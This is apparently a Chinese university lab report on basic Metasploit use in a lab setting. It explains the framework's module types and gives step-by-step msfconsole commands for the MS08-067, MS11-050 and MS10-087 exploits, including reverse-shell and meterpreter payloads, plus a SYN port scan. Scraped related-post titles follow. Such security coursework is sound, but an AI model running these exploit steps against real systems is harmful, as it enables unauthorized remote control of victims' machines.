20145234黄斐《网络对抗技术》实验五,MSF基础应用

概述

MSF的六种模块

  • Exploit模块

    • 是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。
    • 形象点来说就是攻击模块
  • Payload模块
    • 是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。
  • Encoder模块
    • 针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征
    • 不改变payload作用,但能对payload进行加工
  • Aux模块
    • 能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
    • 主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。
  • Post模块
    • 支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作。
    • 这里主要指的是攻击之后可能用到的模块
  • Nops模块
    • 是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在X86 CPU体系架构平台上的操作码是0x90
    • 因为有些代码返回地址很难确认,所以在实际中有时候会填充一大段空指令,便于快速确定返回地址的位置

MS08-067漏洞攻击

  • 启用msf终端:msfconsole
  • 可以通过:search ms08_067,查找相应的漏洞
  • 找到后,会显示相应漏洞的模块,如下图所示
  • 等待时间可能会比较长
  • msfconsole有一个好处,就是每一步的操作都可以提示你后续的步骤,即便不知道指令也可以通过help来查找
  • 根据上述漏洞的模块,我们可以选择相应的模块
    • use exploit/windows/smb/ms08_067_netapi
  • 接下来可以查看相应的攻击载荷,首先我们可以查看可使用的载荷
    • show payloads
  • 因为我们想要获取靶机的shell,所以可以选择以上2种攻击载荷
    • 如:set payload generic/shell_reverse_tcp
  • 注意:此处的目的是获取shell,如果想用meterpreter,找到相应的payload并设置即可
  • 查看配置渗透攻击所需的配置项

    • show options


    • 通过上述操作,可以让我们知道有哪些参数需要进行配置
  • set LHOST 192.168.42.133    //设置攻击IP
    set RHOST 192.168.42.222    //设置靶机IP
  • 接下来可以看看有哪些合适的靶机平台
    • show targets
    • 设置相应平台的编号:set target 0
    • 此处不设置也可以,msf平台可以自动帮你从第一个开始搜索满足要求的靶机平台
  • 发起渗透攻击

    • exploit
  • 获取shell如下图所示
  • 攻击失败
  • 删除靶机的相应补丁


  • 还是失败

问题思考

  • 第一次失败原因:攻击时一直提示,会话不能建立,查询后发现靶机的漏洞已经被补了
  • 第二次失败原因:这个就不清楚了,

MS11050浏览器漏洞攻击

  • 终端中打开msfconsole,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用MS11050漏洞模块;
  • 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
  • 设置具体参数:set LHOST Kali的IPset LPORT 自定义端口号set URIPATH 自定义域名
  • show options查看所有参数是否设置正确,最后下令发起攻击exploit
  • 在靶机上使用IE浏览器访问192.168.199.143:8080/hfhf
  • 攻击成功

MS10-087漏洞攻击

  • 选取module:

    • use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
  • 设置合适的payload:

    • set payload windows/exec
    • 注:此处是运行一个可执行文件
  • set FILENAME 20145234.rft   //设置生成文件rtf
    set CMD notepad.exe //绑定记事本执行
  • 发起渗透攻击

    • exploit
  • 将生成的文件从/root/.msf4/local/20145234.rft拷贝到靶机上,并把格式修改为.doc
  • 双击运行,结果被成功绑定到记事本程序

辅助模块

  • 进入msfconsle后,通过下面相关指令查找辅助模块

    • show auxiliary
    • ack:通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测;
      ftpbounce:通过FTP BOUNCE攻击的原理对TCP服务进行枚举
      syn:使用发送TCP SYN标志的方式探测开放的端口
      tcp:通过一次完整的TCP链接来判断端口是否开放
      xmas:一种更为隐蔽的扫描方式,通过发送FIN,PSH,URG标志能够躲避一些TCP标记检测器的过滤
  • 选取相应的moudle,在这里选择如下:
    • use auxiliary/scanner/portscan/syn
  • 设置好相应参数,可以通过show options来查看

    set RHOSTS 192.168.42.222   //设置扫描目标IP地址
    set THREADS 50  //设置线程数
  • 启动:run,扫描结果如下:
  • 此时,我们也可以在msf下用nmap的相关指令,对目标主机进行扫描:
    • 通过观察不难发现,扫描速度更快,并且对每种端口的作用也有了个说明,能弄清楚每个端口是干嘛的
  • aux模块虽然不像exploit那样直接对靶机进行攻击,但它是排头兵,是对成功实现攻击的很好保障,比如在CTF竞赛中,我们为了查看靶机的web服务,首先就要对开放端口进行扫描,确认哪个端口是挂了web的,然后才有后面的后台扫描、拖库、旁注、提权等操作
  • 所以辅助模块在整个六大模块中的地位也是举足轻重的

总结

  • kali上的metasploit渗透测试工具,是一个功能强大内容丰富的工具集,可以针对系统漏洞、软件漏洞、服务漏洞进行攻击,对于每一种攻击,又有多种攻击载荷可供使用,对于每种攻击载荷又可以使用编码器模块进行加工,所以六大模块相辅相成,构成了渗透的完美系统
  • 就这次实践本身来看,许多攻击还是有一定成功率的,但部分漏洞比较挑剔,只有在特定的系统环境、特定的触发条件,才会被渗透,所以有时为了验证某漏洞的存在,还要专门配一个可以被攻击的靶机;或者,为了攻击成功,不停地寻找更合适的漏洞,这也是本次实践所花的时间成本所在。
时间: 2024-10-09 22:26:10

20145234黄斐《网络对抗技术》实验五,MSF基础应用的相关文章

2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 payload:generic/shell_bind_tcp(成功且唯一) ms17_010_eternalblue:"永恒之蓝"自动化攻击 payload:windows/x64/shell/reverse_tcp_uuid(成功且唯一) 攻击浏览器的实践 ms10_046

2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms08-067; (1分) 一个针对浏览器的攻击,如ms11-050:(1分) 一个针对客户端的攻击,如Adobe:(1分) 成功应用任何一个辅助模块.(0.5分) 2.基础问题回答 exploit是利用漏洞,将攻击代码传送到靶机上,并对靶机进行一系列控制操作的整

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 1. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何一个辅助模块.(0.5分) 任务一 主动攻击实践,ms08_067 靶机:Windows XP SP3

2018-2019-2 20165307《网络对抗技术》Exp5 MSF基础应用

<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,各式各样的漏洞在exploit上进行配置 payload也就相当于载荷,相当于在exploit上创建好了之后在靶机上运行,回连 encode是编码,是为了避免payload中出现坏字符,影响payload的功能,其次是为了实现免杀 post我感觉是最后的修饰吧,在完成之后用post最后进行修饰 离实战还缺些什么技术或步骤? 实验中我们用的靶机大都

2018-2019-2 20165234 《网络对抗技术》Exp5 MSF基础应用

实验四 恶意代码分析 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器的攻击,ms11_050(成功) 3. 一个针对客户端的攻击,Adobe(成功) 4. 成功应用任何一个辅助模块,scanner/ssh/ssh_version,(成功,唯一) 基础问题 用自己的话解释什么是exploit,payload,encode: Exploit:exploit 的英文意思为利

2017-2018-2 20155225《网络对抗技术》实验五 MSF基础应用

2017-2018-2 20155225<网络对抗技术>实验五 MSF基础应用 ms08_067 用search命令,搜索与ms08_067相关的模块,如图: 找到了对应的攻击模块exploit/windows/smb/ms08_067_netapi ,可知这是一个针对windows下,SMB服务的攻击模块. 服务器信息块(SMB)是一个网络文件共享协议,它允许应用程序和终端用户从远端的文件服务器访问文件资源. 描述里说,这是一个微软服务器服务相对路径堆栈损坏漏洞. 具体什么原理也不清楚,反正

网络对抗技术 实验一

实验报告一 学   号201421440025   中国人民公安大学  People Public Security University Of China 网络对抗技术 实验报告   实验一 网络侦查与网络扫描     学生姓名 赵新桐 年级 2014 区队 网络安全与执法四区队 指导教师 高见     信息技术与网络安全学院 2017年7月7日 实验任务总纲 2017-2018 学年 第 一 学期 一.实验目的 1.加深并消化本课程授课内容,复习所学过的互联网搜索技巧.方法和技术: 2.了解

网络对抗技术—实验一实验报告

学   号:201421450005   中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验一 网络侦查与网络扫描     学生姓名 王潜翔 年级 2014级 区队 网安五区 指导教师 高见     信息技术与网络安全学院 2017年7月7日   实验任务总纲 2017-2018 学年 第 一 学期 一.实验目的 1.加深并消化本课程授课内容,复习所学过的互联网搜索技巧.方法和技术: 2.了解并熟悉常用搜索引擎

网络对抗技术——实验一

中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验一 网络侦查与网络扫描     学生姓名 雷浩 年级 2014级 区队 五区 指导教师 高见     信息技术与网络安全学院 2017年7月7日   实验任务总纲 2017-2018 学年 第 一 学期 一.实验目的 1.加深并消化本课程授课内容,复习所学过的互联网搜索技巧.方法和技术: 2.了解并熟悉常用搜索引擎.扫描工具.社交网站等互联网资源,对给定的任务进

网络对抗技术实验四

Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术     学生姓名 李御瑾 年级 2015 区队 三区队 指导教师 高见     信息技术与网络安全学院 2018年10月17日   实验任务总纲 2018-2019 学年 第 一 学期 一.实验目的 1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制:通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识. 2.